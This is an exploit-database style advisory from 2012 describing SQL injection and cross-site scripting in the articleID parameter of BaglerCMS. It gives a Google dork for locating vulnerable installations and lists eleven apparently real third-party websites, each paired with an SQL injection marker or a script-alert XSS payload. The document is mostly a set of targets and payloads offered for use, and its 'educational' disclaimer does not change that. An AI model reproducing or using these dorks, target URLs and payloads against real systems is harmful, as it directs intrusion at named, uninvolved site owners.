1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local, remote, DoS, etc.)     1
 1                                                                        1
 0   [x] Official Website: http://www.1337day.com                         0
 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 0                                                                        0
 1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              1
 0                I'm NuxbieCyber Member From Inj3ct0r TEAM               1
 1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
 ==========================================================================
 <<<:>>>             BaglerCMS- SQLi/XSS Vulnerability               <<:>>>
 ==========================================================================
 - Discovered By:
 ||| TheCyberNuxbie - Independent Security Research |||
 <<< nuxbie@linuxhacktivist.com >>> x YM: nux_exploit
 [ www.linuxhacktivist.com ] $ CP: +62856-2538-963
 - Use it at your risk,,, :-)
 This was written for educational purpos,,,
 Author will be not responsible for any damage. //nuxbie
 
 - Google Dork:
 inurl:"/baglercms.php?articleID="
 [xXx] SQL injection is a code injection technique that exploits a security
 vulnerability occurring in the database layer of an #application.
 The vulnerability is present when user input is either incorrectly
 filtered for string literal escape characters embedded in SQL #statements
 or user input is not strongly typed and thereby unexpectedly executed.
 - Affected items (SQLi):
 http://127.0.0.1/webapps/baglercms.php?articleID=[SQLi]
 - Sample WebApps Vuln (SQLi):
 http://stokkesport.no/baglercms.php?articleID=384' + [SQL Injection]
 http://hoc.no/hmr/baglercms.php?articleID=556' + [SQL Injection]
 http://rgp.no/baglercms.php?articleID=401' + [SQL Injection]
 http://4dagers.no/baglercms.php?articleID=502' + [SQL Injection]
 http://osebergskilag.com/baglercms.php?articleID=2437' + [SQL Injection]
 http://roserittet.no/baglercms.php?articleID=2451' + [SQL Injection]
 http://tck.no/baglercms.php?articleID=772' + [SQL Injection]
 http://velotelmallorca.no/baglercms.php?articleID=1143' + [SQL Injection]
 http://aa-as.no/baglercms.php?articleID=1014' + [SQL Injection]
 http://vestfoldlaserklinikk.no/baglercms.php?articleID=1127' + [SQL Injection]
 http://dokkarundt.no/baglercms.php?articleID=1134' + [SQL Injection]
 , And many More @ Google...!!!
 [xXx] Cross-site scripting (XSS) is a type of computer security vulnerability
 typically found in web applications which allow code #injection by malicious
 web users into the web pages viewed by other users.
 - Affected items (XSSed):
 http://127.0.0.1/webapps/baglercms.php?articleID=[XSS]
 - Sample WebApps Vuln (XSSed):
 http://stokkesport.no/baglercms.php?articleID=<script>alert(31337);</script>
 http://hoc.no/hmr/baglercms.php?articleID=<script>alert(31337);</script>
 http://rgp.no/baglercms.php?articleID=<script>alert(31337);</script>
 http://4dagers.no/baglercms.php?articleID=<script>alert(31337);</script>
 http://osebergskilag.com/baglercms.php?articleID=<script>alert(31337);</script>
 http://roserittet.no/baglercms.php?articleID=<script>alert(31337);</script>
 http://tck.no/baglercms.php?articleID=<script>alert(31337);</script>
 http://velotelmallorca.no/baglercms.php?articleID=<script>alert(31337);</script>
 http://aa-as.no/baglercms.php?articleID=<script>alert(31337);</script>
 http://vestfoldlaserklinikk.no/baglercms.php?articleID=<script>alert(31337);</script>
 http://dokkarundt.no/baglercms.php?articleID=<script>alert(31337);</script>
 , And many More @ Google...!!!
 - Matur Suwun:
 Om n0n0x, Om g3mb3L_YCL, Om cr4wl3r, Om Seeker Unzero, Om Denc0plax, etc,,,
 -:>>> Special Thanks <<<:-
 ...:::' 1337day Inj3ct0r TEAM ':::...
 , And All Inj3ct0r Fans & All Hacktivist,,, :-)
 -=[ Inj3ct0r TEAM | Inj3ct0r 31337 Member ]=-
 Boss r0073r, Sid3^effects, r4dc0re, CroSs, SeeMe, Indoushka, KnocKout,
 ZoRLu, anT!-Tr0J4n, KedAns-Dz, Kalashinkov3, Angel Injection, NuxbieCyber
 #############################################################################
 - Me @ Solo Raya, 09 May 2012 @ 06:44 AM.
  [ Inj3ct0r | PacketStromSecurity | Devilzc0de | Exploit-ID | ID-BackTrack ]
 #############################################################################